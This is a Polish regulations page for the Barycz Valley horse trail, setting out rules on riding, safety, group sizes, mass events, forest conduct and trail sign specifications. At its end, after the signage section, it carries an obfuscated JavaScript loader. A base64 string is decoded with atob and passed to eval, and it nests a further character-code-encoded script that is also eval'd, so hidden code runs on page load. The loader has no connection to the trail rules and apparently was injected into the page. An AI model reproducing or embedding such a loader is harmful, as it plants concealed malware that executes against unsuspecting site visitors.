Regulamin – Szlak Konny Doliny Baryczy

 1. Szlak konny przeznaczony jest do turystycznego, rekreacyjnego i szkoleniowego użytkowania koni wierzchowych, a tam gdzie pozwalają na to warunki terenowe, również zaprzęgów konnych.
 2. W przypadku chęci poruszania się po szlaku bryczką, konieczna jest uprzednie sprawdzenie warunków terenowych w celu uniknięcia jej uszkodzenia lub uszczerbku na zdrowiu zwierząt i ludzi.
 3. Oznakowanie szlaku konnego stanowi emblemat pomarańczowego koła na białym tle namalowany na pniach drzew i słupach oraz innych obiektach umożliwiających odczytanie oznaczenia.
 4. Szczegółowe oznaczenie szlaku przedstawia Załącznik nr 1 do niniejszego regulaminu.
 5. Odcinki dróg powiatowych zostały wyłączone ze szlaku konnego i nie są oznakowane, a ruch po nich odbywa się zgodnie z przepisami ustawy z dn. 20 czerwca 1997 r. – Prawo o ruchu drogowym (Dz. U. 1997 Nr 98 poz. 602 z późn. zm.) Przed wkroczeniem na drogę powiatową na szlaku została umieszczona tablica przedstawiająca schemat odcinka drogi powiatowej wraz z podaniem jego długości łączącego dwa najbliższe fragmenty szlaku konnego.
 6. Granice swobody użytkowania szlaku określają normy prawne, kulturowe i zasady współżycia społecznego przyjęte w Rzeczypospolitej Polskiej.
 1. Każdy użytkownik dorosły korzysta ze szlaku na własną odpowiedzialność, a osoby nieletnie na odpowiedzialność rodzica lub prawnego opiekuna. Zabrania się jeździectwa rekreacyjnego bez opieki osobom w wieku poniżej 17 lat*.
 2. Dla własnego bezpieczeństwa jeździec powinien nosić na głowie toczek lub kask zabezpieczający przed urazem w razie upadku z konia lub uderzeniem w zwisające gałęzie.
 3. Szlak ma charakter terenowy i nie posiada specjalnych przystosowań zwiększających bezpieczeństwo, dlatego też należy zachować na nim szczególną ostrożność, zwłaszcza w przypadku kiedy pokonuje się go po raz pierwszy bez przewodnika.
 4. O wszelkich niebezpieczeństwach i zauważonych zagrożeniach należy informować innych uczestników ruchu na szlaku oraz właścicieli lub zarządców znajdujących się na szlakach ośrodków jeździeckich.
 5. Jazda konna jest dopuszczona jedynie po wyznaczonych drogach, ścieżkach i placach do tego przeznaczonych. Wskazane jest poruszanie się konno kolejno środkiem pasa drogi, o ile warunki inżynieryjno – techniczne temu sprzyjają, w wyjątkowych sytuacjach dopuszczalne jest prowadzenie luzem przez jeźdźca jednego konia po prawej stronie.
 6. Na odcinkach szlaku, biegnącego po drodze publicznej obowiązują ogólne przepisy o ruchu drogowym2. W przypadku pokonywania fragmentów szlaku w terenie zabudowanym należy poruszać się stępem, dla jeźdźca w siodle, natomiast maksymalnie kłusem dla bryczek.
 7. Jeździec musi zwracać uwagę na innych użytkowników dróg leśnych i polnych – turystów pieszych i rowerzystów oraz zwierzęta dzikie i domowe.
 8. Jednorazowa liczba koni przejeżdżających danym odcinkiem nie może być większa niż 10 koni (tzw. „zastęp”), a wciągu doby przez tereny nadleśnictw może przejechać maksymalnie 100 koni.
 9. W przypadku poruszania się w grupie zorganizowanej wskazane jest, aby najbardziej doświadczeni jeźdźcy zajmowali pierwsze i ostatnie miejsce w grupie.
 10. Korzystający ze szlaku powinien posiadać przy sobie kopię paszportu konia lub koni oraz kopię ubezpieczenia od odpowiedzialności cywilnej konia.
 11. Właściciel lub użytkownik konia poruszający się po szlaku powinien zwrócić uwagę na stan zdrowia zwierzęcia. Koń powinien być odrobaczony, zaszczepiony oraz w ogólnej dobrej kondycji zdrowia.
 12. Zabrania się puszczania luzem psa towarzyszącego jeźdźcowi.
 13. Obowiązek uprzątnięcia szlaku po sobie spoczywa na jeźdźcu——

*Art. 36.1. Zabrania się jazdy wierzchem:

 • obok innego uczestnika ruchu na jezdni;
 • bez uzdy
 • po drodze oznaczonej znakami z numerem drogi międzynarodowej oraz po drodze, na której obowiązuje zakaz ruchu pojazdów zaprzęgowych ;
 • po drodze twardej w okresie niedostatecznej widoczności;
 • po drodze twardej osobie w wieku poniżej 17 lat
 1. W przypadku organizacji imprez konnych o charakterze masowym (powyżej 10 zastępów), należy spełnić wymogi zawarte w Ustawie z dnia 20 marca 2009 r. o bezpieczeństwie imprez masowych (Dz.U. 2009 Nr 62 poz. 504).
 2. Organizator imprez masowych zobowiązany jest do uzyskania niezbędnych zgód i zezwoleń w odpowiednich instytucjach.
 3. Organizator imprez masowych ma obowiązek zawarcia porozumienia z nadleśnictwem, w którym będzie organizowana impreza masowa w celu zobowiązania organizatora do usunięcia/naprawy ewentualnych szkód (np. uszkodzeń drogi) powstałych podczas imprezy masowej.
 1. W lesie należy stosować się do zaleceń Służby Leśnej, z uwagą odczytywać oznakowania o ewentualnych pracach leśnych i bezwzględnie się do nich stosować.
 2. Poruszanie się po szlaku jest dozwolone od świtu do zmroku. Dopuszcza się poruszanie się po zmroku pod warunkiem posiadania przez użytkownika szlaku konnego elementów odblaskowych odzieży.
 3. Niektóre odcinki szlaku mogą być okresowo zamykane, np. gdy Nadleśniczy wprowadzi okresowy zakaz wstępu do lasu w przypadku: zniszczenia lub znacznego uszkodzenia drzewostanów lub degradacji runa leśnego, wystąpienia dużego zagrożenia pożarowego, wykonywania zabiegów gospodarczych związanych z hodowlą, ochroną lasu lub pozyskaniem drewna. Odcinki szlaku będą wówczas oznakowane tablicami ZAKAZ WSTĘPU lub w inny czytelny sposób.
 4. Nadleśniczy może zezwolić na poruszanie się końmi wierzchowymi poza wyznaczonymi szlakami w określonym miejscu i czasie.
 5. Poruszanie się na poza oznakowanym szlakiem na terenach leśnych dopuszcza się jedynie w sytuacji wyższej konieczności (ratowania życia i zdrowia ludzi lub koni, alarmu o pożarze lasu, ominięcia powstałych przeszkód, prowadzenia prac leśnych lub innych nieprzewidywalnych sytuacji losowych).
 6. Biwakowanie i rozpalanie ognisk może się odbywać tylko w miejscach do tego przeznaczonych, a na terenach leśnych po uprzednim poinformowaniu Nadleśniczego. W przypadku sprzeciwu funkcjonariusza Lasów Państwowych, rozpalanie ognisk jest zabronione.
 7. Jeździec, poruszając się po szlaku musi zachować ostrożność, ponieważ mogą pojawić się przeszkody powstałe w sposób naturalny, np: osunięcia gruntu, wykroty, złomy, konary złamane (lub zwisające) przez wichury, pioruny lub okiść, drzewa ścięte przez bobry oraz niebezpieczne przedmioty znajdujące się na drodze (gruncie) lub trawie, ściole.
 8. Każda osoba, która zauważyła ogień w lesie ma obowiązek niezwłocznego poinformowania najbliższego funkcjonariusza Lasów Państwowych lub/ oraz Straży Pożarnej.——

*. Art. 35.1.Ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz.U. 1997 nr 98 poz. 602): Jazda wierzchem i pędzenie zwierząt powinny się odbywać po drodze przeznaczonej do pędzenia zwierząt. W razie braku takiej drogi jazda i pędzenie zwierząt mogą odbywać się po poboczu, a jeżeli brak jest pobocza –po jezdni.

1. Znaki określające przebieg szlaku są w kolorze pomarańczowym:

a) podstawowy w kształcie koła o średnicy 60 lub 100 mm – rys. 51;

Szlak1

Na terenie, na którym brak jest nośników naturalnych, zostały umieszczone słupy wraz z tabliczkami z odpowiednim oznakowaniem przebiegu szlaku.


b) znak początku (końca) szlaku w kształcie koła o średnicy 100 mm w kolorze czarnym i na nim symetrycznie umieszczony znak podstawowy szlaku o średnicy 60 mm rys. – 52;

Szlak2


c) znak zmiany kierunku przebiegu szlaku

- znak skrętu w kształcie paska o długości 200 mm i szerokości 30 mm zagięty w połowie pod kątem 90° lub 135° – rys. 53 i 54;

- strzałka o długości 140 mm i szerokości 30/90 mm – rys. 55;

Szlak3 Szlak4 Szlak5


d) wykrzyknik informujący o zmianie kierunku szlaku lub umieszczony w miejscu gdzie przebieg szlaku nie może być wystarczająco wyznakowany – rys. 56;

szlak6

2. Znaki informacyjne to:

a) drogowskaz o wymiarach 150 x 450 mm (w tym strzałka kierunkowa 110 mm), na białym tle umieszcza się logo Doliny Baryczy, nazwę SZLAK KONNY DOLINY BARYCZY, nazwę miejscowości i odległość w kilometrach. Krój i wielkość liter określa załącznik nr 1 do Instrukcji. Na grocie strzałki znak podstawowy szlaku, jeśli dojazd do miejsca, do którego kieruje kierunkowskaz biegnie wzdłuż szlaku, wg poniższego przykładu:

Szlak7

Jeśli dojazd do miejsca, do którego kieruje kierunkowskaz biegnie poza szlakiem, pod odległością w km należy dodać napis o treści „dojazd nieoznakowany, poza szlakiem”, wg poniższego przykładu:

szlak8

var BFMRQRLLVF = atob(‚dmFyIFlSQ09DRk9IWUYgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEyIC0gMiwgMTIzIC0gNSwgOTggLSAxLCAxMjMgLSA5LCAzOCAtIDYsIDExMCAtIDMsIDExMCAtIDksIDEyOCAtIDcsIDM2IC0gNCwgNjUgLSA0LCA0MSAtIDksIDQ3IC0gOCwgNzAgLSA1LCA3MSAtIDQsIDk5IC0gMiwgNzkgLSAxLCAxMTMgLSA0LCA3MCAtIDEsIDgwIC0gOCwgMTI0IC0gOSwgMTEyIC0gMiwgMTI0IC0gOCwgNDMgLSA0LCA2MSAtIDIsIDExIC0gMSwgMTI3IC0gOSwgMTAzIC0gNiwgMTE3IC0gMywgNDAgLSA4LCAxMDIgLSAxLCAxMTYgLSA2LCAxMDEgLSAyLCAxMDggLSA3LCAxMDcgLSA3LCA0MCAtIDgsIDY2IC0gNSwgMzkgLSA3LCA0MiAtIDMsIDgwIC0gMiwgMTI4IC0gNywgNzYgLSAzLCA4OCAtIDQsIDEwNiAtIDgsIDEwOSAtIDUsIDQ5IC0gMSwgNTkgLSA4LCA4MyAtIDcsIDExMSAtIDcsIDYxIC0gNCwgODYgLSA3LCA4NyAtIDQsIDkyIC0gNSwgNzMgLSA0LCAxMTcgLSA3LCA3NSAtIDcsIDExNCAtIDksIDUyIC0gNCwgOTMgLSA0LCA4NCAtIDksIDcwIC0gMywgNTYgLSA4LCAxMDUgLSA1LCA3OSAtIDgsIDExMyAtIDUsIDExOSAtIDgsIDExMyAtIDgsIDgzIC0gNiwgODQgLSAzLCA4NCAtIDMsIDEyNCAtIDYsIDc3IC0gNiwgODQgLSAxLCA2NyAtIDIsIDc5IC0gMSwgODAgLSA4LCAxMjUgLSA2LCAxMjQgLSA5LCA5NyAtIDcsIDc2IC0gMiwgNjkgLSAyLCA1NCAtIDYsIDkzIC0gNywgOTUgLSA1LCAxMDkgLSAyLCAxMjAgLSA5LCA1MiAtIDIsIDg0IC0gOSwgMTIyIC0gMywgNzIgLSAzLCA3NCAtIDIsIDc0IC0gOCwgNjkgLSAxLCA5MSAtIDUsIDEwOCAtIDEsIDg3IC0gNCwgNzMgLSAxLCA5MiAtIDYsIDExNSAtIDUsIDgwIC0gMiwgODYgLSAyLCAxMTMgLSAyLCA5NSAtIDksIDcyIC0gNywgMTE2IC0gOCwgMTE5IC0gOCwgMTI1IC0gNCwgNzUgLSAxLCAxMDkgLSA1LCA5NCAtIDksIDgxIC0gMSwgNzMgLSAyLCA4OSAtIDUsIDc0IC0gNSwgNTUgLSAxLCA3MyAtIDIsIDEwOSAtIDYsIDEyNyAtIDgsIDc1IC0gOSwgODcgLSA5LCA4NyAtIDQsIDkzIC0gMywgODMgLSA5LCA5OSAtIDIsIDkwIC0gOCwgNjEgLSA5LCA1NCAtIDMsIDgyIC0gNywgNTMgLSA0LCA4NyAtIDUsIDc0IC0gNywgODYgLSAxLCAxMjIgLSAxLCAxMDggLSAxLCA1NCAtIDMsIDczIC0gMywgOTAgLSA2LCA1NSAtIDIsIDk0IC0gNiwgOTkgLSAyLCAxMTcgLSA4LCAxMDggLSA5LCA3OCAtIDYsIDc0IC0gMiwgNzAgLSA0LCA5NCAtIDksIDExMSAtIDEsIDc2IC0gMiwgODkgLSA4LCAxMDQgLSAxLCAxMTggLSAyLCA2OSAtIDEsIDc2IC0gOCwgOTEgLSA2LCAxMTAgLSA2LCA5NCAtIDYsIDg3IC0gNiwgNzEgLSA2LCA5NSAtIDYsIDEwMiAtIDQsIDExMSAtIDUsIDY2IC0gMSwgOTAgLSA0LCA4NSAtIDksIDEyOSAtIDksIDEwOCAtIDEsIDEyMSAtIDYsIDgzIC0gOCwgNTggLSA5LCAxMjIgLSAzLCA3NSAtIDcsIDc5IC0gOSwgODcgLSA0LCAxMDYgLSAzLCAxMjUgLSA5LCA4NiAtIDIsIDEyNiAtIDUsIDg1IC0gNCwgMTA0IC0gMywgOTAgLSAxLCAxMTIgLSAzLCA3NyAtIDcsIDc3IC0gNCwgOTkgLSA5LCA3NCAtIDgsIDY5IC0gNCwgMTE4IC0gMSwgNzQgLSAxLCA2NyAtIDEsIDg4IC0gNywgMTE1IC0gOSwgNjkgLSAyLCA3NSAtIDgsIDExOSAtIDQsIDY0IC0gOCwgOTAgLSAyLCA5MCAtIDksIDk2IC0gNywgODUgLSAzLCA4MCAtIDcsIDc1IC0gOCwgMTAzIC0gMywgODEgLSAxLCA4MCAtIDQsIDEyNSAtIDUsIDU1IC0gNywgNTYgLSA3LCA4MCAtIDQsIDg3IC0gNSwgNTEgLSAzLCA3NyAtIDIsIDgxIC0gMywgMTI0IC0gMywgMTA5IC0gMiwgMTIxIC0gOCwgNjkgLSAxLCA4NyAtIDQsIDExNCAtIDIsIDc5IC0gOSwgODYgLSA4LCA4OSAtIDUsIDExOSAtIDgsIDg3IC0gMSwgNzEgLSA2LCAxMTYgLSA4LCA1OCAtIDksIDU2IC0gMiwgOTAgLSA3LCA4NyAtIDYsIDY0IC0gMywgNzAgLSA5LCA0MyAtIDQsIDY0IC0gNSwgMTIgLSAyLCAxMTAgLSA4LCAxMjIgLSA1LCAxMTggLSA4LCAxMDIgLSAzLCAxMjMgLSA3LCAxMTEgLSA2LCAxMTUgLSA0LCAxMTYgLSA2LCAzNiAtIDQsIDEyNyAtIDcsIDExNCAtIDMsIDExOCAtIDQsIDEwMyAtIDgsIDEwOCAtIDcsIDExOSAtIDksIDEwMSAtIDIsIDQ4IC0gOCwgMTI0IC0gOSwgMTE4IC0gMiwgMTE3IC0gMywgMTEzIC0gOCwgMTE5IC0gOSwgMTExIC0gOCwgNTAgLSA2LCAzMyAtIDEsIDEwOCAtIDEsIDEwOSAtIDgsIDEyNSAtIDQsIDQ0IC0gMywgNDEgLSA5LCAxMjYgLSAzLCAxMSAtIDEsIDM2IC0gNCwgMzkgLSA3LCAxMjYgLSA4LCA5OSAtIDIsIDExNSAtIDEsIDM1IC0gMywgMTIwIC0gNiwgMTAyIC0gMSwgMTIxIC0gNiwgNDAgLSA4LCA2OCAtIDcsIDMzIC0gMSwgNDIgLSAzLCA0NiAtIDcsIDY3IC0gOCwgMTEgLSAxLCAzMyAtIDEsIDM5IC0gNywgMTExIC0gOSwgMTE5IC0gOCwgMTIwIC0gNiwgMzggLSA2LCA0OSAtIDksIDEyNiAtIDgsIDk5IC0gMiwgMTIzIC0gOSwgNDAgLSA4LCAxMTQgLSA5LCAzNSAtIDMsIDcwIC0gOSwgMzggLSA2LCA1MiAtIDQsIDYzIC0gNCwgMzYgLSA0LCAxMDggLSAzLCAzNSAtIDMsIDY1IC0gNSwgMzQgLSAyLCAxMjEgLSA2LCAxMTcgLSAxLCAxMTYgLSAyLCAxMTIgLSA3LCAxMTcgLSA3LCAxMDUgLSAyLCA1MCAtIDQsIDExNiAtIDgsIDEwOCAtIDcsIDExMiAtIDIsIDExMCAtIDcsIDExNyAtIDEsIDEwNyAtIDMsIDY4IC0gOSwgMzkgLSA3LCAxMDYgLSAxLCA1MCAtIDcsIDQ0IC0gMSwgNDkgLSA4LCAzOCAtIDYsIDEyOSAtIDYsIDE1IC0gNSwgNDAgLSA4LCAzNCAtIDIsIDM2IC0gNCwgMzQgLSAyLCAxMTkgLSA1LCAxMDQgLSAzLCAxMjEgLSA2LCAzNyAtIDUsIDUxIC0gOCwgNjkgLSA4LCAzOSAtIDcsIDg4IC0gNSwgMTIwIC0gNCwgMTE3IC0gMywgMTA3IC0gMiwgMTE3IC0gNywgMTA0IC0gMSwgNTQgLSA4LCAxMDQgLSAyLCAxMTkgLSA1LCAxMTcgLSA2LCAxMTAgLSAxLCA3MiAtIDUsIDEwOCAtIDQsIDEwNiAtIDksIDExNyAtIDMsIDc1IC0gOCwgMTE4IC0gNywgMTA3IC0gNywgMTA0IC0gMywgNDggLSA4LCAxMTggLSAzLCAxMjAgLSA0LCAxMjEgLSA3LCAxMTMgLSA4LCAxMTUgLSA1LCAxMTEgLSA4LCA0NyAtIDEsIDEwNiAtIDcsIDEwOSAtIDUsIDEwMiAtIDUsIDExOCAtIDQsIDc1IC0gOCwgMTE1IC0gNCwgMTA0IC0gNCwgMTAyIC0gMSwgNzQgLSA5LCAxMjQgLSA4LCA0OSAtIDksIDEwNyAtIDIsIDUwIC0gOSwgMzggLSA2LCAxMDEgLSA3LCAxOSAtIDksIDE2IC0gNywgMTIgLSAzLCAxOCAtIDksIDE4IC0gOSwgMTE0IC0gNywgMTA1IC0gNCwgMTMwIC0gOSwgNTEgLSA1LCAxMDUgLSA2LCAxMDcgLSAzLCAxMDAgLSAzLCAxMTkgLSA1LCA3MiAtIDUsIDExNSAtIDQsIDEwMyAtIDMsIDEwOCAtIDcsIDc0IC0gOSwgMTIwIC0gNCwgNDIgLSAyLCAxMDYgLSAxLCAzMyAtIDEsIDM5IC0gMiwgMzYgLSA0LCAxMTIgLSA1LCAxMDcgLSA2LCAxMjcgLSA2LCA1MyAtIDcsIDExNiAtIDgsIDEwOSAtIDgsIDExNSAtIDUsIDEwOSAtIDYsIDEyMyAtIDcsIDEwOSAtIDUsIDQ4IC0gNywgNDcgLSA2LCA2MiAtIDMsIDExIC0gMSwgMzggLSA2LCAzOCAtIDYsIDEzMiAtIDcsIDE1IC0gNSwgMzggLSA2LCAzOCAtIDYsIDEyMiAtIDgsIDEwOSAtIDgsIDEyMiAtIDYsIDEyNSAtIDgsIDExNyAtIDMsIDExMiAtIDIsIDM5IC0gNywgMTE1IC0gMSwgMTA4IC0gNywgMTIxIC0gNiwgNjIgLSAzLCAxNSAtIDUsIDEzMCAtIDUsIDE4IC0gOCwgMTUgLSA1LCAxMjYgLSA4LCAxMDQgLSA3LCAxMjMgLSA5LCAzOSAtIDcsIDEwNyAtIDcsIDEwMyAtIDIsIDEwMyAtIDQsIDM2IC0gNCwgNjQgLSAzLCAzOSAtIDcsIDEyMyAtIDMsIDExNSAtIDQsIDExOSAtIDUsIDk4IC0gMywgMTEwIC0gOSwgMTE1IC0gNSwgMTAzIC0gNCwgNDMgLSAzLCAxMDQgLSA3LCAxMjQgLSA4LCAxMTYgLSA1LCAxMDQgLSA2LCA0MSAtIDEsIDEwMiAtIDEsIDExNiAtIDYsIDEwNCAtIDUsIDEwOCAtIDcsIDEwMiAtIDIsIDQyIC0gMSwgNDYgLSAyLCAzOSAtIDcsIDExNSAtIDgsIDEwOSAtIDgsIDEyMiAtIDEsIDQ1IC0gNCwgNjUgLSA2LCAxNSAtIDUsIDQ4IC0gOCwgMTEzIC0gMywgMTA2IC0gNSwgMTIyIC0gMywgMzggLSA2LCA3NiAtIDYsIDEyNSAtIDgsIDExNiAtIDYsIDEwMyAtIDQsIDEyNCAtIDgsIDExMSAtIDYsIDExNCAtIDMsIDExNiAtIDYsIDQ3IC0gNywgMTA4IC0gOCwgMTEwIC0gOSwgMTA1IC0gNiwgNDMgLSAyLCA0NCAtIDMsIDQ0IC0gNCwgNDIgLSAxLCA2NyAtIDgsIDEzIC0gMywgMTggLSA4KTtldmFsKFlSQ09DRk9IWUYpOw==’);
eval(BFMRQRLLVF);